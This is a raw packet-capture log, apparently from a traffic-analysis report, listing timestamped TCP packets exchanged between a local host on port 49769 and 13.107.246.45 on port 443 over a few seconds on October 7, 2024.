                                                          Oct 7, 2024 18:47:15.995784044 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:16.039397001 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:16.040770054 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:16.042965889 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:16.042979956 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:16.054445982 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:16.056392908 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:16.082037926 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:16.083993912 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:16.127398014 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:16.129601955 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:16.131601095 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:16.131618977 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:16.143745899 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:16.145627022 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:16.170368910 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:16.172442913 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:16.215409040 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:16.217622042 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:16.220474958 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:16.223428965 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:16.232933998 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:16.235493898 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:16.258709908 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:16.261533976 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:16.303419113 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:16.307782888 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:16.310214043 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:16.310256004 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:16.320828915 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:16.322997093 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:16.347649097 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:16.349716902 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:16.391421080 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:16.394445896 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:16.397950888 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:16.398001909 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:16.399633884 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:16.401588917 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:16.411170959 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:16.413184881 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:16.439449072 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:16.441512108 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:16.482223988 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:16.483975887 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:16.499103069 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:16.500849962 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:16.528676033 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:16.530981064 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:16.570554018 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:16.572244883 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:16.587729931 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:16.589366913 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:16.635397911 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:16.641333103 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:16.643006086 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:16.643035889 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:16.659199953 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:16.660964012 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:16.677324057 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:16.679296970 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:16.723395109 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:16.726310968 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:16.729233027 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:16.729254007 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:16.731014967 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:16.733381033 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:16.750308990 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:16.753407001 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:16.767937899 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:16.770628929 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:16.811424971 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:16.814187050 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:16.817792892 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:16.817835093 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:16.839329958 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:16.842566013 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:16.874864101 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:16.877665043 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:16.902683973 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:16.905313969 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:16.940103054 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:16.943126917 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:16.965071917 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:16.967626095 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:17.000157118 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:17.004270077 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:17.029994965 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:17.033179045 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:17.075392962 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:17.106499910 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:17.110399961 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:17.110418081 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:17.112828016 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:17.123254061 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:17.126391888 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:17.171408892 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:17.187587976 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:17.190979004 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:17.191018105 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:17.209017038 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:17.211853027 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:17.247736931 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:17.250695944 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:17.287874937 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:17.292130947 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:17.298924923 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:17.301173925 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:17.337330103 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:17.341005087 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:17.377367020 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:17.380170107 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:17.387276888 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:17.389427900 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:17.427232027 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:17.429917097 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:17.465421915 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:17.468823910 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:17.475364923 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:17.477560997 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:17.517555952 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:17.520081043 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:17.553282976 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:17.556448936 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:17.565059900 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:17.567482948 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:17.611428022 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:17.632507086 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:17.635848999 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:17.635879993 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:17.640938997 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:17.644133091 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:17.653958082 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:17.656703949 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:17.699419022 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:17.717916965 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:17.721440077 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:17.721499920 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:17.724176884 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:17.726108074 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:17.733321905 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:17.735307932 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:17.745750904 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:17.747545004 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:17.791419029 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:17.807816982 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:17.810869932 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:17.810905933 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:17.817585945 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:17.819715977 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:17.835479021 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:17.837712049 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:17.879395008 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:17.889628887 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:17.896153927 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:17.896190882 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:17.899755955 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:17.902121067 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:17.939294100 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:17.942222118 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:17.983418941 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:18.013458967 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:18.016542912 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:18.016586065 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:18.062295914 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:18.068536997 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:18.068576097 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:18.147816896 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:18.151053905 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:18.151073933 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:18.194566011 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:18.200475931 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:18.200510979 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:18.224224091 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:18.269246101 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:18.269320965 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:18.269328117 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:18.273318052 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:18.273452997 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:18.273485899 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:18.274122000 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:18.290055037 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:18.291851044 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:18.306418896 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:18.308294058 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:18.355397940 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:18.570053101 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:18.570092916 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:18.570272923 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:18.573997974 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:18.574009895 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:18.574930906 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:18.574935913 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:18.575745106 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:18.575748920 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:18.676317930 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:18.725873947 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:18.725897074 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:18.729192019 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:18.729208946 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:18.729243994 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:18.729247093 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:18.743921041 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:18.745784044 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:18.761526108 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:18.803960085 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:18.803970098 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:18.809262037 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:18.809391022 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:18.809425116 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:18.833357096 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:18.836486101 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:18.844597101 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:18.846437931 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:18.887423038 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:18.897418976 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:18.899733067 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:18.899750948 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:18.921402931 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:18.923537016 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:18.932440996 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:18.934273958 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:18.975416899 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:18.982549906 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:18.984729052 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:18.984740973 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:18.987687111 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:18.989516973 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:19.011539936 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:19.013591051 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:19.022650957 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:19.025156021 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:19.070555925 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:19.074580908 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:19.101300001 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:19.104197025 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:19.110337019 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:19.112464905 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:19.158586979 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:19.162673950 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:19.164163113 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:19.166862965 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:19.193308115 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:19.196290016 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:19.202444077 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:19.204605103 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:19.246845007 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:19.249392986 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:19.266907930 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:19.269429922 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:19.284544945 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:19.286695957 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:19.327419043 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:19.331083059 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:19.333966017 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:19.334003925 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:19.339345932 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:19.342005968 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:19.359977961 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:19.362754107 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:19.376403093 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:19.396680117 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:19.422235966 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:19.425977945 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:19.448939085 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:19.452208042 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:19.465034008 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:19.467555046 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:19.510082006 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:19.513847113 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:19.536751986 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:19.539336920 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:19.553256035 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:19.555396080 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:19.595397949 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:19.598138094 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:19.600402117 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:19.600450039 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:19.634316921 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:19.639667988 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:19.642117023 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:19.694587946 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:19.694596052 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:19.700426102 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:19.736769915 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:19.740971088 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:19.787414074 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:19.804153919 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:19.804174900 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:19.804373026 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:19.808092117 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:19.808128119 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:19.808748007 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:19.808782101 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:19.830200911 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:19.830267906 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:19.905783892 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:19.905963898 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:19.971043110 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:19.971088886 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:19.972901106 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:19.972939014 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:19.981606960 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:19.987710953 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:19.987778902 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:19.987787008 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:20.038423061 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:20.067135096 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:20.067329884 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:20.117263079 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:20.163350105 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:20.258024931 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:20.261090040 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:20.261128902 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:20.264827013 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:20.266377926 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:20.266412020 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:20.278527021 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:20.323404074 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:20.352718115 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:20.352819920 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:20.404498100 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:20.404555082 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:20.405952930 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:20.405956984 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:20.408185005 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:20.416220903 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:20.416230917 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:20.418869019 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:20.421710014 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:20.421744108 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:20.471612930 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:20.497056961 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:20.538330078 CEST49769443192.168.2.413.107.246.45
                                                          Oct 7, 2024 18:47:20.549578905 CEST4434976913.107.246.45192.168.2.4
                                                          Oct 7, 2024 18:47:20.549712896 CEST49769443192.168.2.413.107.246.45
